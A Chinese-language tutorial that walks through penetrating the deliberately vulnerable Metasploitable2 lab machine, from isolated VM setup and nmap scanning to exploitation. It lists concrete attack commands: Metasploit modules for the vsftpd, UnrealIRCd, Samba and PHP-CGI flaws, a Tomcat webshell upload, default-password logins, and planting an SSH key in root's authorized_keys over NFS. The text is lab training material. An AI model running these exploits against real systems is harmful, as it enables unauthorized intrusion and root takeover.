从零到一:Metasploitable2靶机实战渗透全流程解析
1. Metasploitable2靶机初探:安全测试的绝佳沙盒
第一次听说Metasploitable2时,我还以为是什么高科技武器系统。后来才发现,这其实是安全圈内公认的"漏洞博物馆"——一个故意设计成漏洞百出的Linux系统,专门用来练习渗透测试技术。就像学开车要先在驾校场地练习一样,Metasploitable2就是我们网络安全新手的训练场。
这个靶机最妙的地方在于它集成了十几种经典漏洞,从弱密码到远程代码执行应有尽有。我刚开始接触时,看到这么多漏洞既兴奋又紧张,就像拿到了一个装满各种锁具的工具箱,需要逐个尝试打开。官方提供的默认账号是msfadmin/msfadmin,这个弱密码本身就是第一个待攻破的入口。
记得我第一次成功登录系统时,那种突破防线的成就感至今难忘。不过要提醒的是,这个靶机绝对不能连接到公网,就像你不会把驾校的教练车开上高速公路一样。建议在VMware或VirtualBox这类虚拟化环境中搭建,与Kali攻击机组成独立的实验网络。我通常会给Kali分配192.168.1.100,Metasploitable2用192.168.1.101,这样既简单又好记。
2. 环境搭建与网络配置
2.1 虚拟机环境准备
在开始渗透之前,我们需要搭建一个安全的实验环境。我推荐使用VMware Workstation Player(免费版就够用),它比VirtualBox的网络配置更稳定。安装好虚拟机软件后,先导入Kali Linux镜像,再导入Metasploitable2的OVA文件。这里有个小技巧:把两台虚拟机的网络适配器都设置为"仅主机模式",这样就能创建一个与外界完全隔离的测试网络。
配置网络时我踩过不少坑。有次忘记关闭DHCP服务,导致IP地址冲突,扫描结果全乱了。现在我的标准做法是:
- Kali Linux固定IP:192.168.184.130
- Metasploitable2固定IP:192.168.184.134
- 子网掩码统一用255.255.255.0
验证网络连通性时,不要只用ping命令。我习惯先用arp-scan -l扫描整个网段,这比nmap更快发现存活主机。如果看到靶机的MAC地址对应着Vulnerable LLC这个厂商(这是Metasploitable2的默认设置),就说明环境配置正确。
2.2 必要工具安装与配置
虽然Kali已经预装了大部分工具,但我还是建议更新一下Metasploit框架:
sudo apt update && sudo apt upgrade -y metasploit-framework对于渗透测试,有几个神器必须准备好:
- Nmap:端口扫描的瑞士军刀
- Metasploit:漏洞利用的自动化平台
- Hydra:暴力破解工具
- Netcat:网络调试的万能工具
我习惯在开始前先创建一个专用工作目录:
mkdir ~/metasploitable2_lab && cd ~/metasploitable2_lab这样所有的扫描结果和日志都能集中管理,后期复盘时特别方便。
3. 信息收集与漏洞扫描
3.1 主机发现与端口扫描
信息收集就像侦探破案前的现场勘查。我通常分三步走:
第一步,用Nmap做快速扫描:
nmap -T4 -F 192.168.184.134这个命令能在几秒钟内识别开放的常见端口。-T4参数表示加速扫描,适合实验环境。
第二步,全面扫描:
nmap -p- -sV -O -T4 192.168.184.134这个命令会:
-p-:扫描所有65535个端口-sV:探测服务版本-O:识别操作系统
扫描完成后,你会看到Metasploitable2开放了20多个端口,从21端口的FTP到6667端口的IRC服务,每个都可能藏着漏洞。
3.2 漏洞扫描与验证
知道开放哪些服务后,就该检查具体漏洞了。Nmap自带的漏洞脚本非常有用:
nmap --script=vuln 192.168.184.134这个扫描会比较耗时,但能发现很多有趣的东西。比如它会提示:
- FTP服务存在vsftpd 2.3.4后门
- Samba服务有命令注入漏洞
- Java RMI服务可远程代码执行
我习惯把扫描结果保存为XML格式,方便后续分析:
nmap -oX scan_result.xml 192.168.184.1344. 漏洞利用实战演练
4.1 弱密码漏洞利用
Metasploitable2简直就是弱密码的重灾区。我总结了几种常见的弱密码利用方式:
1. Telnet登录(23端口)
telnet 192.168.184.134输入用户名msfadmin和密码msfadmin即可获得shell。不过telnet是明文传输,现实中基本已经被SSH取代。
2. MySQL登录(3306端口)
mysql -h 192.168.184.134 -u root直接回车(空密码)就能进入MySQL数据库。想象一下如果生产环境的数据库这样配置会多危险。
3. VNC远程桌面(5900端口)
vncviewer 192.168.184.134密码是password。登录后能看到完整的图形界面,这相当于拿到了整台机器的控制权。
4.2 Vsftpd后门漏洞利用(21端口)
这个漏洞特别经典,存在于vsftpd 2.3.4版本中。当用户名以":)"结尾时,会悄悄开启6200端口的后门。
手动利用步骤:
ftp 192.168.184.134 # 用户名输入:user:) # 密码随意然后在另一个终端连接6200端口:
nc -nv 192.168.184.134 6200成功后会获得root权限的shell!
用Metasploit自动化利用更简单:
msfconsole use exploit/unix/ftp/vsftpd_234_backdoor set RHOSTS 192.168.184.134 exploit4.3 Samba命令注入漏洞(139端口)
这个漏洞允许通过Samba服务执行系统命令。在Metasploit中的利用方法:
use exploit/multi/samba/usermap_script set RHOSTS 192.168.184.134 exploit成功后会获得nobody用户的权限。虽然权限不高,但已经是重大突破了。
4.4 UnrealIRCd后门漏洞(6667端口)
这个IRC服务存在隐蔽后门,可以直接拿到root权限:
use exploit/unix/irc/unreal_ircd_3281_backdoor set RHOST 192.168.184.134 exploit成功后会看到#号提示符,输入id命令可以看到uid=0(root),说明已经拿到最高权限。
5. 权限提升与后渗透技巧
5.1 通过NFS共享获取root权限
Metasploitable2配置了不安全的NFS共享,我们可以利用它来植入SSH密钥:
showmount -e 192.168.184.134 mkdir /tmp/nfs mount -o nolock 192.168.184.134:/ /tmp/nfs然后把自己的公钥写入靶机的authorized_keys文件:
echo "ssh-rsa AAAAB3NzaC..." >> /tmp/nfs/root/.ssh/authorized_keys之后就可以无密码SSH登录了:
ssh root@192.168.184.1345.2 通过Tomcat管理台部署Webshell
Tomcat服务(8180端口)使用了默认凭证tomcat:tomcat:
- 访问http://192.168.184.134:8180/manager/html
- 上传包含webshell的WAR文件
- 访问对应的URL路径即可执行命令
在Metasploit中可以用自动化模块:
use exploit/multi/http/tomcat_mgr_upload set HttpPassword tomcat set HttpUsername tomcat set RHOSTS 192.168.184.134 set RPORT 8180 exploit5.3 通过PHP CGI漏洞执行命令
Apache的PHP-CGI存在参数注入漏洞:
use exploit/multi/http/php_cgi_arg_injection set RHOSTS 192.168.184.134 exploit这个漏洞可以直接获得www-data用户的权限。
6. 渗透测试中的注意事项
在实际操作中,我发现有几个容易出错的地方需要特别注意:
网络配置问题:确保攻击机和靶机在同一网段,且能互相ping通。有次我花了两个小时排查漏洞利用失败的原因,最后发现是虚拟机网络模式设成了NAT。
服务未启动:Metasploitable2的某些服务可能需要手动启动。比如Tomcat服务,如果发现8180端口没开,可以登录靶机执行:
sudo /etc/init.d/tomcat5.5 start- 时间不同步:某些漏洞利用对时间敏感,如果Kali和靶机时间差太大可能导致失败。建议定期同步时间:
sudo timedatectl set-ntp true日志清理:练习结束后,记得清理靶机上的日志和上传的文件,保持环境干净。特别是通过Web漏洞上传的webshell,一定要删除。
法律边界:反复强调,这些技术只能在自己完全控制的实验环境中使用。未经授权的渗透测试是违法行为,后果可能非常严重。